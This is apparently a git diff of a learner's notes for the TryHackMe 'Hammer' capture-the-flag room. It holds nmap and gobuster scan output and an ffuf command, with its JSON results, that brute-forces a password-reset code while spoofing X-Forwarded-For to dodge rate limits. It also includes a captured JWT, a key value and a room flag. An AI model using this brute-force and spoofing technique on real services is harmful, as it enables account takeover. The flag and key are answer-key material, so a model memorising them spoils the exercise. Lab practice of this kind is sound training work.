initial commit

CTF/Hammer/hist/188ade1.key

@@ -0,0 +1 @@
+56058354efb3daa97ebab00fabd7a7d7

CTF/Hammer/hist/composer.json

@@ -0,0 +1,42 @@
+{
+    "name": "firebase/php-jwt",
+    "description": "A simple library to encode and decode JSON Web Tokens (JWT) in PHP. Should conform to the current spec.",
+    "homepage": "https://github.com/firebase/php-jwt",
+    "keywords": [
+        "php",
+        "jwt"
+    ],
+    "authors": [
+        {
+            "name": "Neuman Vong",
+            "email": "neuman+pear@twilio.com",
+            "role": "Developer"
+        },
+        {
+            "name": "Anant Narayanan",
+            "email": "anant@php.net",
+            "role": "Developer"
+        }
+    ],
+    "license": "BSD-3-Clause",
+    "require": {
+        "php": "^7.4||^8.0"
+    },
+    "suggest": {
+        "paragonie/sodium_compat": "Support EdDSA (Ed25519) signatures when libsodium is not present",
+        "ext-sodium": "Support EdDSA (Ed25519) signatures"
+    },
+    "autoload": {
+        "psr-4": {
+            "Firebase\\JWT\\": "src"
+        }
+    },
+    "require-dev": {
+        "guzzlehttp/guzzle": "^6.5||^7.4",
+        "phpspec/prophecy-phpunit": "^2.0",
+        "phpunit/phpunit": "^9.5",
+        "psr/cache": "^1.0||^2.0",
+        "psr/http-client": "^1.0",
+        "psr/http-factory": "^1.0"
+    }
+}

CTF/Hammer/hist/error.logs

@@ -0,0 +1,9 @@
+[Mon Aug 19 12:00:01.123456 2024] [core:error] [pid 12345:tid 139999999999999] [client 192.168.1.10:56832] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:01:22.987654 2024] [authz_core:error] [pid 12346:tid 139999999999998] [client 192.168.1.15:45918] AH01630: client denied by server configuration: /var/www/html/
+[Mon Aug 19 12:02:34.876543 2024] [authz_core:error] [pid 12347:tid 139999999999997] [client 192.168.1.12:37210] AH01631: user tester@hammer.thm: authentication failure for "/restricted-area": Password Mismatch
+[Mon Aug 19 12:03:45.765432 2024] [authz_core:error] [pid 12348:tid 139999999999996] [client 192.168.1.20:37254] AH01627: client denied by server configuration: /etc/shadow
+[Mon Aug 19 12:04:56.654321 2024] [core:error] [pid 12349:tid 139999999999995] [client 192.168.1.22:38100] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/protected
+[Mon Aug 19 12:05:07.543210 2024] [authz_core:error] [pid 12350:tid 139999999999994] [client 192.168.1.25:46234] AH01627: client denied by server configuration: /home/hammerthm/test.php
+[Mon Aug 19 12:06:18.432109 2024] [authz_core:error] [pid 12351:tid 139999999999993] [client 192.168.1.30:40232] AH01617: user tester@hammer.thm: authentication failure for "/admin-login": Invalid email address
+[Mon Aug 19 12:07:29.321098 2024] [core:error] [pid 12352:tid 139999999999992] [client 192.168.1.35:42310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
+[Mon Aug 19 12:09:51.109876 2024] [core:error] [pid 12354:tid 139999999999990] [client 192.168.1.50:45998] AH00037: Symbolic link not allowed or link target not accessible: /var/www/html/locked-down

CTF/Hammer/hist/gobuster.output

@@ -0,0 +1,21 @@
+===============================================================
+Gobuster v3.6
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://hammer.thm:1337/
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
+[+] Negative Status codes:   404
+[+] User Agent:              gobuster/3.6
+[+] Timeout:                 10s
+===============================================================
+Starting gobuster in directory enumeration mode
+===============================================================
+/phpmyadmin           (Status: 301) [Size: 320] [--> http://hammer.thm:1337/phpmyadmin/]
+/vendor               (Status: 301) [Size: 316] [--> http://hammer.thm:1337/vendor/]
+Progress: 141708 / 141709 (100.00%)
+===============================================================
+Finished
+===============================================================
+

CTF/Hammer/hist/nmap.output

@@ -0,0 +1,33 @@
+Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-12 13:24 CEST
+Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
+SYN Stealth Scan Timing: About 1.43% done; ETC: 13:25 (0:01:09 remaining)
+Nmap scan report for hammer.thm (10.10.90.79)
+Host is up (0.045s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT     STATE SERVICE VERSION
+22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 40:1d:40:df:3a:40:83:e2:fb:2f:87:92:fb:e3:dd:a9 (RSA)
+|   256 af:94:ea:e6:88:91:3d:be:f8:c7:1a:07:b9:0b:9e:24 (ECDSA)
+|_  256 57:e7:f3:97:dd:81:d7:30:3b:5a:b7:12:03:20:50:21 (ED25519)
+1337/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
+| http-cookie-flags: 
+|   /: 
+|     PHPSESSID: 
+|_      httponly flag not set
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+|_http-title: Login
+Device type: general purpose
+Running: Linux 4.X
+OS CPE: cpe:/o:linux:linux_kernel:4.15
+OS details: Linux 4.15
+Network Distance: 2 hops
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 256/tcp)
+HOP RTT      ADDRESS
+1   46.33 ms 10.14.0.1
+2   46.48 ms hammer.thm (10.10.90.79)
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 118.35 seconds

CTF/Hammer/hist/output.txt

@@ -0,0 +1 @@
+{"commandline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o output.txt","time":"2025-04-12T14:20:19+02:00","results":[{"input":{"FFUFHASH":"49c3b84b","W1":"2122","W2":"192.168.0.122"},"position":2123,"status":200,"length":2190,"words":595,"lines":53,"content-type":"text/html; charset=UTF-8","redirectlocation":"","scraper":{},"duration":43169327,"resultfile":"","url":"http://hammer.thm:1337/reset_password.php","host":"hammer.thm:1337"}],"config":{"autocalibration":false,"autocalibration_keyword":"FUZZ","autocalibration_perhost":false,"autocalibration_strategies":["basic"],"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w count-9999.txt:W1 -w fake-ip-cut.txt:W2 -u http://hammer.thm:1337/reset_password.php -X POST -d recovery_code=W1\u0026s=80 -b PHPSESSID=67ns90g5fomm1s17dno6d7uk32 -H X-Forwarded-For: W2 -H Content-Type: application/x-www-form-urlencoded -fr Invalid -mode pitchfork -fw 1 -rate 100 -o output.txt","configfile":"","postdata":"recovery_code=W1\u0026s=80","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=67ns90g5fomm1s17dno6d7uk32","X-Forwarded-For":"W2"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"pitchfork","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"W1","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt","encoders":"","template":""},{"name":"wordlist","keyword":"W2","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{"regexp":{"value":"Invalid"},"word":{"value":"1"}},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"output.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":100,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/reset_password.php","verbose":false,"wordlists":["/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt:W1","/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt:W2"],"http2":false,"client-cert":"","client-key":""}}

CTF/Hammer/hist/possible_user.txt

@@ -0,0 +1 @@
+tester@hammer.thm

CTF/Hammer/hist/source-dashboard-php.txt

@@ -0,0 +1,91 @@
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Dashboard</title>
+    <link href="/hmr_css/bootstrap.min.css" rel="stylesheet">
+    <script src="/hmr_js/jquery-3.6.0.min.js"></script>
+    <style>
+        body {
+            background: url('/hmr_images/hammer.webp') no-repeat center center fixed;
+            background-size: cover;
+        }
+        .container {
+            position: relative;
+            z-index: 10; /* Make sure the content is above the background */
+            background-color: rgba(255, 255, 255, 0.8); /* Slight white background for readability */
+            padding: 20px;
+            border-radius: 10px;
+        }
+    </style>
+	
+	    <script>
+       
+        function getCookie(name) {
+            const value = `; ${document.cookie}`;
+            const parts = value.split(`; ${name}=`);
+            if (parts.length === 2) return parts.pop().split(';').shift();
+        }
+
+      
+        function checkTrailUserCookie() {
+            const trailUser = getCookie('persistentSession');
+            if (!trailUser) {
+          
+                window.location.href = 'logout.php';
+            }
+        }
+
+       
+        setInterval(checkTrailUserCookie, 1000); 
+    </script>
+
+</head>
+<body>
+<div class="container mt-5">
+    <div class="row justify-content-center">
+        <div class="col-md-6">
+            <h3>Welcome, Thor! - Flag: THM{AuthBypass3D}</h3>
+            <p>Your role: user</p>
+            
+            <div>
+                <input type="text" id="command" class="form-control" placeholder="Enter command">
+                <button id="submitCommand" class="btn btn-primary mt-3">Submit</button>
+                <pre id="commandOutput" class="mt-3"></pre>
+            </div>
+            
+            <a href="logout.php" class="btn btn-danger mt-3">Logout</a>
+        </div>
+    </div>
+</div>
+
+<script>
+$(document).ready(function() {
+    $('#submitCommand').click(function() {
+        var command = $('#command').val();
+        var jwtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzQ0NDYxMzkwLCJleHAiOjE3NDQ0NjQ5OTAsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.CtEofSfkpfpiUx3jureTlS29FfzVOLLkZVaYrl8oP3M';
+
+        // Make an AJAX call to the server to execute the command
+        $.ajax({
+            url: 'execute_command.php',
+            method: 'POST',
+            data: JSON.stringify({ command: command }),
+            contentType: 'application/json',
+            headers: {
+                'Authorization': 'Bearer ' + jwtToken
+            },
+            success: function(response) {
+                $('#commandOutput').text(response.output || response.error);
+            },
+            error: function() {
+                $('#commandOutput').text('Error executing command.');
+            }
+        });
+    });
+});
+</script>
+</body>
+</html>
+